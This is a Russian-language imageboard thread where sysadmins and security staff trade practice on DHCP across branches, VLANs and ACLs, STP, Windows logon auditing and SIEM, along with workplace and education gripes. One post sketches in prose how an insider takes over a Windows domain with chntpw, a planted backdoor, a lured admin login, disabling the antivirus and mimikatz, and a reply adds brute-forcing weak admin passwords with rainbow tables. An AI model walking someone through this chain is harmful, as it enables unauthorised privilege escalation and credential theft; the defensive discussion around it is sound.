какое-то...
Кстати, вот зашла речь про dhcp, разжуйте как его правильно настраивать в не плоской сети, в которой куча вланов, и в которой несколько филиалов соединённых site-to-site vpn.
>>1163236 >чтобы он это дело починил. У нас уже такое было, когда наш МТС завернул часть нашего трафика во внешний мир, но это было до того как я пришёл работать в это место, подробностей не знаю, знаю, что дело замяли выполненной заявкой о сломанном сервисе. У нас крупная антипутинская контора, ничего больше говорить не стоит, и есть вероятность, что нас прослушивало ФСБ
>крупный бизнес у нас до сих пор по бандитским понятиям живет к сожалению Не знаю, но наш уже так не живёт, у нас не убивают и калечат, может где-то есть, но думаю, что крайне редко А про приехать и ноги сломать - это российский менталитет, у нас так люди делают, вот ты машину мне запер, а я подожду и ноги тебе сломаю, наверное, для нашего бизнеса - это завести уголовное дело против кого-то, или сделать проверку, а там настоять на уголовном деле против сотрудника
>тебя просто не возьмут на работу, чтобы не рисковать лишний раз Я знаю, я и есть СБ, мы не берём, ещё и на полиграф сажаем все ключевые позиции
я просто неплохой линуксойд и виндузятник, но плохой кисочник
>>1163247 Если несколько филиалов, с различающимися подсетями и маршрутизацией поверх vpn, то очевидно, что нужно делать локальный dhcp в каждом филиале. Если сеть уровня энтерпрайза, т.е. L2/L3 vpn и в КАЖДЫЙ филиал есть резервный канал, то тогда можно dhcp централизовать для удобства управления, а на самих площадках прописывать ip address-helper [shcp_server_ip] для проброса бродкаста на центральный dhcp.
>>1163250 >у нас не убивают и калечат, может где-то есть, но думаю, что крайне редко Не знаю, насколько оно часто встречается, но точно встречается. Почти весь крупный бизнес в рашке в руках бывших бандитов, методы у них соответствующие.
>нас крупная антипутинская контора Как там в штабе Навального?
>>1163254 >Как там в штабе Навального? Хуёво, владелец конторы уже не в рахе, я думаю, что пора съёбывать, вот и почитываю про сиськи для общего развития
>>1163254 >>1163247 >то тогда можно dhcp централизовать для удобства управления Хз, я бы так не стал делать, одна локация - один DHCP, только если это не совсем крошечный филиал на 1-2 ПК, да и те лучше настраивать хотя бы на роутер А вообще ты должен помнить, что AD DS и авторизация без DNS не работает, поэтому DHCP это только одна из проблем. Я делал так: Если филиал на 3-5 ПК, то там стоял только роутер, хотя у меня всегда был обычный SSL_VPN, так как он больше нравится, так вот, там был роутер уровня микротика, и без l2/l3 от провайдера, да и провайдеров был вагон, так как где-то были только 4g без вариантов, а где-то лучшую цену давали МГТС, где-то местные крохи-провайдеры, там свой DHCP, DNS и домен в офисе, второй DNS от провайдера, если канал падал, то всё работало внутри сети, лимит стоял на 50 авторизаций без входа в домен, как правило это более чем хватало, так как больше чем пары часов канал не лежал, а 50 авторизаций тебе хватит чуть ли не на неделю без домена, а то и на месяц. Если филиал был крупный, на компов 20+, тогда уже делал полноценный контроллер домена
У нас была строительная фирма, как правило мелкие объекты - стройки, там метами вообще приходилось ставить обычные ASUS RT-AC66u, так как на объекте 2 ноута и принтер, им кроме вайфая ничего и не нужно, и интернет, чтобы кино посмотреть, а было пару филиалов, с инженерами, там уже ставил второй контроллер домена. Хотя филиалы были мелкие до 30пк, с одним ВЛАНом на всё, без натива Хотя тут сетивеки меня за анусы могут говном закидать, так как вланов в нём нету
>>1163271 В целом верно всё говоришь. Другое дело, что у нас в энтерпрайзе другие масштабы. Есть только одна площадка всего с двумя вланами, где в одном висит сразу и принтер, и комп, а в другом IP-телефон. Но в целом мелкая для нас - это площадка не из одного человека, а пользователей на 20-50. Для такого количества никто не будет выделять стойку, ставить ИБП, локальные сервера с контроллером и т.п. Плюс если от ЦОДа площадка отвалится - информационная система всё равно работать не будет, а без этого бизнес практически встанет. Поэтому везде два канала, а локальные сервера есть только на очень крупных площадка на несколько сотен рабочих мест, как правило, там есть и локальные информационные системы, но всё равно 2-3 канала до ЦОДа... Там где нет второго канала L2 vpn - есть локальный инет и тунели до ЦОДа через него. Обычно на таких площадках инет еще используется для касс и эквайринга, чтобы оплату можно было принять в любом случае, т.е. даже если ЦОД упадет.
Что до авторизации в AD, то там таймаут и кэш по времени, а не по количеству авторизаций, вроде. Он по умолчанию что-то с неделю позволяет входить в комп без доступности контроллера...
>Ты вообще можешь спрашивать Про что? Про Навального? Мне не очень интересно. Я не поддерживаю Путина и его политику, но и не вижу возможности поддержать кого-то другого. Тот же Навальный, очевидно, не сможет справиться с управлением страной - у него нет и никогда не было понимания как сделать из России процветающее государство. Хуже того, нет никакой уверенности, что у него вообще есть подобная цель...
>>1163292 >уже и забывать стал Винда - это пиздец, если честно. Грузишься в кали, делаешь chntpw, чистишь кэш GPO, грузишься в винду без сети, делаешь закладку, которая позже позволит тебе расширить права до админских. Перезагружаешься уже с сетью, звонишь админу - дескать у тебя проблема какая-то серьезная, просишь его посмотреть. Он заходит на твой комп... Дальше повышаешь права до админских, убиваешь антивирус, запускаешь мимикац, получаешь пароль админа. Ну или хэш пароля, если винда новая. Тоже не плохо.
>>1163304 Брутить по словарям, потом радужными таблицами. Обычно у админов в мелко-средне конторах пароли уровня Zm3ev1k, или !Comany123# т.е. пароли с низкой энтропией и брут вполне реален. А до выхода 8-ки так и вовсе прямо сам пароль в памяти висел. ХЗ когда попатчили это в 7-ке, но найти дырявую систему вполне реально. Вплоть до того, что можно ее поставить вручную и самому завести в домен - по умолчанию это любой пользователь может сделать...
Не знаю, есть ли здесь виндовс-админы, но если есть, пусть они сами расскажут как защищают свои адешки и защищают ли вообще. Я если что, сетевик и виндой уже очень давно не занимался, не уверен, как оно там сейчас всё.
>>1163327 Скажем так, в большой компании гораздо выше вероятность того, что такие действия вообще заметят, но насколько оперативно и заметят ли вообще - это большой вопрос. В ряде мест компы выпадающие из домена/касперского и пребывающие в таком состоянии по несколько дней - это норма... А на этапе внедрения новой площадки, вообще может черте что твориться, т.к. сроки все сорваны и нужно быстрее развернуться, а о безопасности начинают думать только после запуска объекта. Обе ситуации лично встречал.
Короче, я проебал всё по собственной глупости и теперь сижу с дипломом токаря. Хочу сисадмином быть. Нравится ковыряться в компьютерах, освоил линукс, могу в виртуализацию через qemu/kvm. Интересует вакансия помощника сисадмина(читай эникей). Что там вообще делать? Типа офисная тех.поддержка? Пиздец, мне стыдно даже с моим дипломом на собеседование идти. Подгорает ещё от того, что в повальном большинстве случаев, в компаниях используют парашный windows server, а я уже слишком привык к никсам. Ну и собственно платиновые вопросы: что подучить? Что требуют на таких работах?
>>1163301 >chntpw Так-то да, можно хеш пароля с любого загрузятора вытащить, даже кали не нужен, при условии, что биёс не запаролен, а комп не опломбирован замком
Насколько я знаю фиксится обычный раздачей прав, так, что на одной локации в ГПО в локальные админы добавляется только конкретные УЗ, на другой другие, ясен хуй с домен админа никто не загружается, для каждого сервиса своя УЗ, ну то есть норма делать просто логин для сотрудника и отдельный для домен админа, а третий для энтерпрайз админа, и везде разные пароли, кек Как итог одна УЗ локального админа может обслужить только 100-200 ПК максимум, и в целом не должна иметь больших прав, но зачастую, как мы все знаем, юзается локаладмин с паролем на уровне 87654321, который бесправный в домене, но зато все залиты с одного образа и одним паролем
По ИБ подразумевается, что ты не сможешь ничего загрузить, что может нарушить целостность шиндоус, из ОС тебе прав не хватит, а из EFI - БИОС, ну кек, короче, по поводу вытащить хард и унести отдельная тема, не будем её вскрывать эту тему
>>1163165 >Уже сейчас, полагаю, можео все это автоматизировать Ну пиздуй, автоматизируй, хули ты.
>>1163340 >Короче, я проебал всё по собственной глупости и теперь сижу с дипломом токаря Диплом токаря это лучше чем ничего. А если ИТ заебёт можешь обратно станкам откатиться.
Забыл сказать >>1163327 тут ты прав>>1163328, у нас так и есть, сидим в два ИБшника, на 6к людей, скорость реагирования низкая, ввели SIEM для собора и анализа логов, сейчас пытаемся внедрить машин лёрнинг для поиска отклонений, но сейчас по сути, если УЗ какого-то админа на локации будет найдена по радужной карте, то с огромной долей мы можем проебать это, реакция будет только на количество операций или очень специфичный евент, как 1102 (вроде такой у удаления журналов). У нас только 4624 - успешный вход, в сутки около миллиона событий, а на общем фоне мусорного доступа так вообще нереально разобраться, пока успешность внедрения машин лёрнинга на нуле. отсюда и появляются всякие делегирования прав и бесправность, сервисные УЗ под одну задачу и тп, по всяким там ПСИ ДСС или ИСО у 1 сотрудника должна быть персональная УЗ c доступом не больше 1 сервиса, так как 1 юзер может осуществлять не больше 1 роли администрирования, винда - виндузятнику, линукс - линуксойду, сеть - сетевику
>>1163165 Красавчик, ты отстал лет на 10, это всё уже есть, но админы придумывают новые вирусы и софт, чтобы их не увольняли
>>1163340 У меня друг руководитель сетевиков в интеграторе, по образованию филолог, твой диплом никому не важен, важны только сертификаты, тебя разве, что в газпром не возьмут, там минимум МГУ
>>1163384 >в газпром не возьмут, там минимум МГУ Куча знакомых из МГУ и что-то никого их них не зовут в газпром. А вот в яндексы/авито зовут. Правда если ты с мехмата или вмк... В газпроме, скорее, связи важны, а за связями нужно куда-нибудь в плешку. Правда и оттуда у меня знакомый есть - работает аналитиком в самсунге, лол. Короче, корка почти ни на что не влияет. Разве что в гос структурах на высокие управляющие должности не возьмут.
>>1163365 >одна УЗ локального админа может обслужить только 100-200 ПК максимум Ну тут смотря что значит "обслуживать", у нас вот на 3к пользаков всего три виндовс-админа... Ясен хуй, на каждый комп с доменной учеткой они не ходят. А под какими учетками локально сидет - в душе не ебу, я ж не шпион...
>>1163377 Да на самом деле нихера вы не сделаете. Единственный вариант - это агент на каждый комп, который отслеживает то, что реально нужно отслеживать и собирает в БД. А то ведь в домене невозможно даже определить какой пользователь в какие компы залогинен! Событий же входа/выхода и правда генерируется слишком много. Олсо для них вам не машинное обучение нужно, а какой-нибудь эластик серч и корреляционный анализ логов с самых разных источников, ведь одних контроллеров домена в сети может быть несколько десятков.
>>1163916 >корка почти ни на что не влияет Корка действительно может быть показателем знаний, я это понял только к 27 годам, когда приходят ребята из физтеха или мгупи и разница в их знаниях огромная, и первые умеют и жопу рвать, и осваивать новый материал, а вторые хотят только 9-18 и зп
>>1163916 >Ну тут смотря что значит "обслуживать" Домен одмен не будет логинется на юзер-пк, так как избыточность, на каждом ПК есть локальная группа Администраторы, куда по дефолту входят "домен одменс", но принято, через ГПО на определённую ОУ вешать группу юзеров, которая добавляется в локального админа каждой рабочей станции, чтобы эникей имел права Локального Одмена, но только в своей ОУ (локации обслуживания), и не более
>>1163916 > то ведь в домене невозможно даже определить какой пользователь в какие компы залогинен! Можно, на контроллерах эвент 4624, просто каждый успешный логин он генерирует 4624 с определённым type (SMB RDP и прочие), просто когда много людей, то эвентов, как я писал выше, слишком много
>>1163916 >Единственный вариант - это агент на каждый комп, который отслеживает то, что реально нужно отслеживать и собирает в БД Агенты и так есть, и это норма: ДЛП (может мониторить любой протокол передачи информации, SMB, RDP, Removable storage, https, ftp, всё, что хочешь), Антивирус (он может делать в буквальном смысле всё, даже блокировать файлы для пользователей по хешу, хотя всё от антивиря зависит, запрещать USB порты, определённые флешки с определённым ID, вообще все), есть всякие TimeInformer (почитай в гугле подробней, он мониторит каждый клик пользователя и делает скриншот), агентов много, просто они очень избыточны, и даже с тысячами фильтров дают овер событий, если событие чётко не определено (запуск вируса, копирования телефонных номеров, удаление журнала), то хуй его просто так отследишь >>1163916 >какой-нибудь эластик серч и корреляционный анализ логов с самых разных источников, ведь одних контроллеров домена в сети может быть несколько десятков А у нас он и есть с платной подпиской на машин лёрнинг, у нас и есть десяток КД и десяток ДХЦП, плюс 4 эксчейнджа Ещё раз, у нас такое количество событий, что чтобы подгрузить эвенты за сутки-двое надо потратить минут 5, при том, что эластик стоит на самых быстрых дисках в СХД, просто пиздец короче. Плюс, есть проблема с нагрузкой, у админов есть своя работа, и им нужно выполнять всякие скрипты и сценарии, от чего в кибане можно наблюдать пикрл, где сервисные УЗ выдают сотни тысяч эвентов каждый час, мы их не можем отследить глазами, для этого понадобиться отдельный человек, который сутками будет торговать лицом в события, поэтому и была предпринята попытка ввести машинлёнинг (2 пик без эвентов успешного логина 4624 и логофффа 4634, так как там просто пиздец будет, я даже запрос не смогу выполнить)
Короче, в плане ИБ большой продакшен полная пизда, так как на тебя начинают ссылаться если в отделе нету продаж, мол из-за блокировок ИБ, ойтишники постоянно пытаются сделать тебя крайним: "у юзера не работает скайп - виновто ИБ, не работает печать - ИБ", так как ИБ может блокировать приложения, а разобраться на месте никто не хочет. Приходится делать множество компромиссных решений, которые не секьюрны
>>1163922 >каждый успешный логин он генерирует 4624 с определённым type Так это и есть самая большая архитектурная проблема винды. Нет простого способ включить, например, только отслеживание входов пользователей с ручным вводом пароля во всем домене. Отслеживаются сразу все входы (в т.ч. и автоматические логины учетных записей - компьютеров!) и в итоге тысячи событий, которые уже не несут никакой информации. Поэтому я и предложил поставить агента, который бы фиксировал только то, что реально важно.
>приходят ребята из физтеха или мгупи и разница в их знаниях огромная Никто не спорит, что в физтехе/мгу подготовка потрясающая и без умения быстро и эффективно учиться в этим места не попасть, а если и попасть, то не окончить. А именно навык быстро учиться новому в IT самый востребованный. Но не стоит думать, что люди без образования или с дипломами всяких МИРЭА сильно хуже. Во-первых, среди них тоже хватает умных и эффективных, во-вторых, требующие 9-18 и ЗП - это рабочие лошадки, без которых тоже никуда.
>начинают ссылаться если в отделе нету продаж, мол из-за блокировок ИБ, ойтишники постоянно пытаются сделать тебя крайним: "у юзера не работает скайп - виновто ИБ, не работает печать - ИБ" Надо тоже начать жаловаться на наших безопасников, а то они абсолютно всем(!) закрыли гмейл, вконтакт, ютуб и т.д. Спасибо за идею! Правда есть нюанс - у нас иерархия власти уродская. Начальник службы безопасности и IT-дир равны по рангу (формально) и выше них только директор компании - баба, которой похуй о чем там "мальчики" спорят, лол. При том эта баба бывшая любовница реального владельца бизнеса и всё о чем она думает - как бы ее саму не выпиздили, ведь в реальности все ключевые решения принимаются внешней управляющей компанией (ага мы часть огромного конгломерата). Ну и начальник службы безопасности там у них на мази по слухам (да и вся управляшка по ходу - это бывший криминал, силовики, экс чиновники и пр. воры в законы), а IT-дир нет - это приглашенный на время со стороны человек (и их у нас уже о-о-очень много разных было...). Короче, добро пожаловать, в пидорашка-энтерпрайз...
>>1163931 Не, ввод с клавиатуры можно отследить, есть такой тип: https://habrahabr.ru/company/netwrix/blog/148501/ 2 — Интерактивный (вход с клавиатуры или экрана системы) Но есть другой важный момент - юзеры не выключают ПК десятилетиями, а даже если за ПК садится кто-то другой, он может не разлогинить прошлого юзера, ну и тупой машинлёнинг в ЕЛК не умеет делать корреляцию на конкретные эвенты из коробки, а чтобы написать это руками в QUERY и DQL я слишком тупой, как и наши подрядчики, лол блджат
>>1163931 >или с дипломами всяких МИРЭА сильно хуже Я не думаю, я же пишу, что такой диплом менее показательный, да и вообще насколько я знаю МИРЭА и МГУПИ больше нету, сейчас это единый МТУ! И ещё тупые HR-ы, ой бля, заёбывают почему у меня непристойный вуз, и не хочу ли я в 27 лет ещё получить диплом "хотя-бы бауманки", ебанутые мрази
У нас над всем ИТ и ИБ стоит "Бизнес", всем похуй на что там безопасно или нет, разве, что откровенно сливать нельзя Человеку нужен вконтакт? - клиентам писать, ИБ не согласовало, значит упали продажи Нужен ютуб? - ролики по продажам смотреть - ИБ виновато Мы ввели единый гуглхром, к нам приходит один из директоров по продажам (их много), и говорит, что ему похуй на ИБ, и его сотрудникам нужен менеджер паролей как расширение в гугле, мы шлём нахуй, а он "продажи падают, так как пока сотрудник вводил пароль клиент развернулся и ушёл", вот так и живём. Здравого смысла почти нету Человек судим за убийство и разбой - берём, он понравился на собеседовании ну это хоть 1 раз за год было, не больше
Всё хочу пидорнуть и уйти в интегратор или проломиться в нормальный крупный наебизнес, а вторая работа загрузила так, что вообще нету времени написать резюме и куда-то сходить, надеюсь к февралю съебу
>>1163938 >юзеры не выключают ПК десятилетиями Принудительную блокировку экрана сделать через 30 минут и автоматическую перезагрузку в ночь с субботы на воскресенье для установки обновлений.
>У нас над всем ИТ и ИБ стоит "Бизнес" ХЗ как у вас там на самом деле, но в бизнес над всем не верю. Или ты KPI имел в виду? Потому что KPI и у нас тоже все выполняют и перевыполняют, лол...
>хочу пидорнуть и уйти в интегратор или проломиться в нормальный крупный наебизнес Тоже рад бы уйти куда-нибудь, но жизненный опыт подсказывает, что везде будет примерно тоже самое, на разве что офис получше/похуже и зарплата побольше/поменьше.
>>1163944 >честно отсидел Суть в том, что он не просто "понравился" - он явно чей-то протеже, при том кого-то, кто сильно выше службы безопасности стоит. Подумай сам, ведь никто с судимостью тебя даже на собеседование не позовет...
>>1163951 Не, я тебе всё описал как есть, именно так, не KPI, а именно продажи, всё делается для эффективности продаж. Хоть ДЛП внедрили, так как стали слишком много клиентов пиздить, а теперь цифровая утечка перекрыта, только пизди сам хард с пк или фоткай экран.
>>1163931 >Начальник службы безопасности и IT-дир равны по рангу В принципе, так и надо. Все, что написано дальше, очень хуёво, конечно. >>1163951 >автоматическую перезагрузку в ночь с субботы на воскресенье И в это время тоже какая-нибудь сволочь может "работать". Как вариант VDA и desktop on demand подошло бы, но, опять же, 1) мало ли, почему >юзеры не выключают ПК десятилетиями, может, там ДОКУМЕНТЫ ВАЖНЫЕ ОТКРЫТЫ; 2) в филиале в ебенях десктоп из головного ДЦ будет полдня грузиться; 3) ну и дорого плюс ёбнутое лицензирование.
>>1163938 >МИРЭА Лол, меня хотели туда запихнуть в нулевых, ездил туда на подготовительные занятия - освещение хуёвое, отопления нет, в аудиториях все в куртках занятия говно - ну я и забил хуй и поступил в соседний МИТХТ - откуда вылетел на 4 курсе, потому что тоже говно ебаное - а сам МИТХТ внезапно объединился с МИРЭА в некий МТУ - представляю какая это шарага.
>>1163949 >Сам бомблю, братишка, сам бомблю Да у меня вообще с государственными учебными заведениями довольно хуёво складывается. Хорошо хоть вернулся в ВУЗ после армейки и, пересилив себя, таки осилил высшее образование. Но больше в ВУЗы эти сраные не ногой.
Зато в том году отучился в "Специалисте" на сетевика и ещё по программе внедрения бесконтактной идентификации в учреждениях культуры - вот это всё реально доставило. Чай, не рашкоВУЗы.
>>1163956 >в некий МТУ - представляю какая это шарага. У нашего правительства план убрать все лишние ВУЗы, и сделать высшее образование элитарным, как в США, чтобы не каждый пидораха шёл за коркой, а были именно реальные специалисты, понимающие суть вопроса. А сам МТУ должен за сколько-то там лет попасть в мировой топ 500, как МГУ, поэтому такие и аббревиатуры, лол, не уверен, что взлетит, но там посмотрим мимо закончившей заочку МИРЭА
>>1163958 >чтобы не каждый пидораха шёл за коркой Интересно как они это сделают если построенный совком социальный лифт без высшего образования не поднимает выше второго этажа.
>>1163956 >МИРЭА Я там отучился в нулевых. Всё ОК было, но там сильно роляла кафедра. Я был на ВМС на кафедре НИИАА. Учили реально хорошо, а на соседней кафедре того же факультета и специальности люди просто нихуя не делали годами...
>отучился в "Специалисте" на сетевика Ой, ой. По мне так и сертифицированные курсы fast line по cisco не дают достаточно хорошей подготовки, а уж что там в Специалисте творится, вообще боюсь себе представить.
Но и твой и мой случай лишний раз доказывают, что качественное образование - это в первую очередь заслуга учащегося и было бы желание учиться, а возможность найдется.
>>1163955 >ДОКУМЕНТЫ ВАЖНЫЕ ОТКРЫТЫ Это всё легко решается созданием регламента и доведением его до сведения пользователей под подпись. Плюс комп не перезагружается внезапно, а предупреждает об этом сильно заранее. Если при таком раскладе кто-то теряет рабочие файлы - сам мудак, пусть остается в ночь и делает заново, лол.
>Начальник службы безопасности и IT-дир равны по рангу >В принципе, так и надо. Только по факту сотрудник отдела безопасности выше по иерархии, чем рядовой админ, т.к. первый последнему доступы ограничить может, а админ безопаснику - нет. В итоге равенство между IT и безопасностью в принципе невозможно, чтобы бы мы там формально не прописывали и не декларировали.
>>1163964 > не поднимает выше второго этажа Я вангую, что у них наполеоновские планы, но на деле всё как обычно обосрётся не успев появиться Думаю, что план такой: на обычных работников, выполняющих как конвейер рутинную операцию, перекладывающих бумажки и пишущих письма по электронной почте будут брать максимум после бакалавра, а то и после колледжа. на главбуха, главадмина, главинженера должен идти минимум с хорошей вышкой, шарящий по всем направлениям господин, которые мыслит не в плоскости, а в пространстве
Что не устраивает сейчас? То, что у ВО нету ценности, даже дворники ходят с ВО и кассиры в пятёрочках, хотя им никогда эти знания не пригодятся, а ценность имеет только именитый вуз. Поэтому зачем ждать пока пидораха просидит за 6 лет штаны в вузике, когда его можно отправить отучиться 3 года, получить базовые навыки в этом тупость российского образования, так как за 3 года можно с 0 стать CCNP, который кроме сетей знать ничего не будет, но намного более квалифицированным специалистом, чем рашен колледж, и пойти платить налоги. Студент же невыгодное явление для государства по мнению пыни, у нас бурить некому, или строить, а планктон не нужен, он долго учится и не платит налоги, а потом не выдаёт натуральное производство. А майнинг так вообще головная боль, так как пидорахи стали лучше жить, зачем работать за 15к в меся, если можно купить 1 вк и она будет тебе отбивать эту сумму сидя на жопе и двачуя капчу
Короче, идея средней паршивости, а зная российско-совковый менталитет ждём когда всё окончательно обосрётся под стандартами 70ых годов. Насколько я знаю, у нас даже ТБ по работе за ПЭВМ не переписали, мы всё перед ЭЛТ ЧБ мониторами сидим, с подставкой
>>1163973 >Я там отучился в нулевых. Всё ОК было, но там сильно роляла кафедра Бля, как меня там матан заебал, "типовой расчёт" ой бляяя, я сейчас ряд фурье хуй разложу
>>1163981 >тупость российского образования, >так как за 3 года можно с 0 стать CCNP, который кроме сетей знать ничего не будет, но намного более квалифицированным специалистом, чем рашен колледж
>>1163981 В чем-то ты прав. Точнее, во всем, что касается отечественного высшего образования. А неточность в непонимании системы вышки "там". В Европе/США практически никто вышку не получает, потому что вышка - это для тех, кто хочет заниматься научной деятельностью. И всякие выпускники IT-since в штатах - это не наши кодеры с запись в диплом "инженер-программист", а реальные ученые, разбирающиеся в вычислительной сложности алгоритмов, дискретной математике и прочих сложных вещах.
И количество ВУЗов то мы сократим, но вот только от этого выпускники того, что осталось не превратятся из кодеров в ученых!
>>1163985 Да, первые 3 семестра ебали знатно: линейка, матан, ТФКП, диффуры, дискра, физика и большая часть этого всего параллельно и на весьма серьезном уровне. Но потом стало сильно проще - пошла специализация, а в IT у нас полный швах, да и математика то сильная осталась со времен совка - скоро и она деградирует, вероятно.
>>1163988 Как будто что-то плохо. Выше уже написал - во всем мире простые люди идут таким путем и не знают проблем.
>>1163994 > в IT у нас полный швах Да, я когда защищался, так как был уже действующим админом, то ясен хуй брал сетевой диплом, просто переписал частями свой сети, и это пушка, антиплагиат показал 80% оригинального текста, диплом со всеми конфигами вышел на 150 страниц, я им рассказывал про бамп ссл трафика, про флаги пакетов, про то как можно наёбывать фаерволлы по длинне пакета, когда новая информация перезаписывает старую, про интеграцию линукса в АД ДС, про многоранговые сети, про то как упаковать IPsec в UDP, и вообще про всё, что актуально Комиссия, и препод по сетям нихуя не понимали, по занятиям мы ушли чуть дальше модели ОСИ, поставили оценку "ОТЛИЧНО", так как рецензент написал "Отлично", пушка, короче Но вот матаном, физикой и электротехникой я заебался на всю жизнь, хотя матан очень структурировал моё мышление, о том сколько приходилось решать первые 3 года не жалею
>>1163994 >во всем мире простые люди идут таким путем и не знают проблем Да я бы тоже на "абразавание" хуй забил, и так вылетев с 4 курса, если бы после этого в армии сапогами не отпинали бошку так, что я понял, что без него в этой стране, если собираешься работать не на себя, никуда -
Тащемта и моя текущая должность требует высшего образования. Хорошо хоть не профильного, а то бы я и тут обосрался с моим дипломом гуманитария.
>>1163996 Согласен, матан был полезен только для мозгов, сам по себе ни разу не пригодился и сейчас окончательно забыт.
По поводу IT - комиссия состоит из старых дедов, они нихуя не секут ни в чем, а оценивают просто "доклад", ну то есть в целом как ты держишь, насколько уверенно говоришь, отвечаешь на вопросы.
Я защищал вообще не свою разработку, лол! Но в итоге получил отлично, а мой доклад сочли лучшим среди всех за день... из-за этого чуть было не случился скандал, потому что я "забыл" явиться на оглашение результатов защиты.
>>1163997 Так и я шел в ВУЗ чисто ради откоса от армии. Но... на военку меня не взяли из-за... недобора веса. В итоге после выпуска пришлось полгода работать на оборонку по специальности за копейки (это такая извращенная форма откоса была), пока не мать не помогла с деньгами на покупку военника.
>>1163998 >В итоге после выпуска пришлось полгода работать на оборонку по специальности за копейки (это такая извращенная форма откоса была), пока не мать не помогла с деньгами на покупку военника.
А я вообще на всё забил, пока за мной не приехали менты и не увезли в военкомат, откуда увезли в распределитель и срауз в часть.
Хороший пример того как не надо забивать на всё хуй.
>>1164000 >не надо забивать на всё хуй На надо, но понять где грань мне очень сложно, сейчас читаю про биохакинг: https://vc.ru/26886-personal-biohacking и понимаю, что это чуть-ли не другая крайность...
Сетевики, расскажите в трёх словах о best practices в ACL между вланами/подсетями/рутером, на разных уровнях доступа/агрегации/ядра, какой трафик режете, какой разрешаете
>>1164040 Всё зависит от задач. Как правило стараются делать как можно меньше ACL, т.к. они могут сильно влиять на производительность. Самое частое - предоставление влана подрядчикам без доступа ко внутренним сетям, т.е. инет-онли.
>>1164048 >видеонаблюдение Вообще для этого нужна отдельная изолированная физическая сеть, иначе никак. Равно как и для СКУДа. Иначе это будет уже не безопасность...
>кассы Зависит от площадки. В отдельный влан то их выделяют, конечно, но скорее чтобы на роутере проще было PBRить, если нужно или на фаерволе фильтровать. Доступ из влана с кассами к пользакам и обратно никто не запрещает как правило, а иногда он и вовсе нужен буквально, т.к. некоторые кассы могут с компом по сети взаимодействовать.
>телефония Она, конечно, в отдельном влане, если IP-телефония вообще есть, удовольствие очень дорогое. А LLDP юзается, например, с телефонами avaya, подключенными к коммутаторам cisco.
>>1164051 На одном из рабочих мест всё это было свалено в одну плоскую сеть. Описал как всё разбросать по вланам, запросил оборудование и кучу сетевых разеток с дополнительными шкафами коммутационными, мне сначала ответили нет проблем, купили с2960g 48 портовых несколько, часть с пое под телефоны, часть без, на "ядро" одну c3750g, я сел с ними экспериментировать (до этого не особо с реальным железом сидел). А потом резко перестали выделять бабло на ИТ, и отказали в розетках и коммутационных шкафах, так что на новое оборудование нормально было и не переехать. В итоге ушёл оттуда, а там всё ещё оборудование пылится, сеть плоская и розеток нет.
>>1164051 >Вообще для этого нужна отдельная изолированная физическая сеть, иначе никак.
Лол бля у нас камеры вообще ни к каким сетям не подключены и живут "своей жизнью". Как следствие что отсутствие оперативного доступа, что дикий рассинхрон во времени со всем остальным оборудованием и реальным временем.
>>1164053 Ну в плане телефонии авайя может даже и получше будет, чем циско.
>>1164264>>1164321 Обычно "камеры" - это сеть видеонаблюдения, где помимо камер есть сервера, куда пишутся все видео-потоки и рабочие места безопасников, где на куче мониторов можно смотреть сразу десятки видео-потоков и быстро переключаться между ними. Если камеры приличные, то трафик они могут генерировать очень существенный, потому что даже если речь идет только о контроле всех входов/выходов/парковок/лифтов их нужно овер дохуя. Оно, конечно, может работать поверх пользовательского оборудования, но помимо нагрузок, есть еще и опасность атаки со стороны любого хуя с ноутом, который задосить камеру, например...
>>1164380 >>1164369 Про сиськи от части вздвачну, закупали до крымнаш циски по 2700р/трубка, после бума, я стал закупать фанвиллы, функционал больше, надёжность не хуже, как работает так и работает, а цена вместо 90$ всего 60
>>1163958 >У нашего правительства план убрать все лишние ВУЗы, и сделать высшее образование элитарным, как в США, План верный, в общем-то. Т.к. большинство абитуры идет в ВУЗы непонятно зачем. Исходя из вопроса "А где учат на программиста" если мы об ИТ. Если такой вопрос возникает, то это не в ВУЗ надо, а в техникум.
>>1164040 Не знаю какие там best practice, скажу, как это сделано у нас. По факту у нас почти нигде нет никаких ACL. Между пользователями трафик никак не режется. Пользовател разбиты на Vlan по этажам. Есть гостевые сегменты, они отделены от пользовательсоко фаерволлом. Пилить ACL руками считаю неправильным. Нужно как можно меньше создавать такой ручной работы, иначе можно в ней утонуть к чертовой матери.
>>1164436 >Сетевики, срочно, вопрос про СТП: какие stp enhancements где используются, и используются ли вообще с приходом RSTP STP enhancements??? У нас STP (точнее RSTP) работает по дефолту. Единственное, что меняем, это priority на коммутаторах, которые выступают ядром/распределением. STP это вообще такая тема, которую, как многие считаю, лучше не трогать и не опираться на него. Использование M-LAG и LACP и ьтехнологий стекирования коммутаторов нифелирует надобность тюнинговать STP для отказоустойчивости.
>>1164548 >У нас STP (точнее RSTP) работает по дефолту. ну всякие portfast, bpduguard, bpdufilter используем где надо, конечно же. Но глобально СТП не трогаем. Вообще я считаю, что в сети надо L2 домен как можно больше сужать и роутинг выводить даже на уровень доступа, если есть такая возможность. А дальше уже L3 и динамический роутинг.
>>1164552 >роутинг выводить даже на уровень доступа Я, конечно, нихуя не CCNA, но мне казалось, что рутер слишком дорогой, и межденный по сравнению с асиками в коммутаторах, где цена за порт в тысячу раз меньше
а разве LACP должно исключать RSTP в том же ядре? Я просто сколько читаю, там любят соединять коммутаторы перекрёстно, или эти картинки подразумевают виртуализацию коммутаторов? Как на пике
>>1164561 >Я, конечно, нихуя не CCNA, но мне казалось, что рутер слишком дорогой, и межденный по сравнению с асиками в коммутаторах, где цена за порт в тысячу раз меньше Сейчас все коммутаторы умеют L3, хотя бы урезанный. И вот такие коммутаторы ставятся на доступ. С ядром и распределением L3-стыки и роутинг. Роутеры тут не нужны, т.к. коммутаторы умеют L3. Такой дизайн поможет избежать проблем на L2 уровне, всякие петли и т.д. и даст ECMP. Ну и даст возможность гибко регилировать политики на фаерволле. С L3 проще работать, чем с L2. Может у кого-то другое мнение, было бы интересно узнать. >>1164563 >То есть ACL по сути только на межсетевом экране, где запрещается все кроме прокси и тп? ну что-то вроде того. На фаерволле разграничен доступ из сегментов ДМЗ в сегмент серверов, из пользовательского сегмента в сегмент серверов. Также на фаерволле (у нас) терминируются туннели и разграничивается трафик из филиалов в сегменты ДМЗ и серверов...ну и так далее.
Также лично у нас в каждом из наших филиалов стоят аппаратеные фаерволлы, на которых мы резем трафик, пробрасываем порты и так далее. Просто это удобнее, т.к. есть единая консоль управления всеми этими фаерволлами.
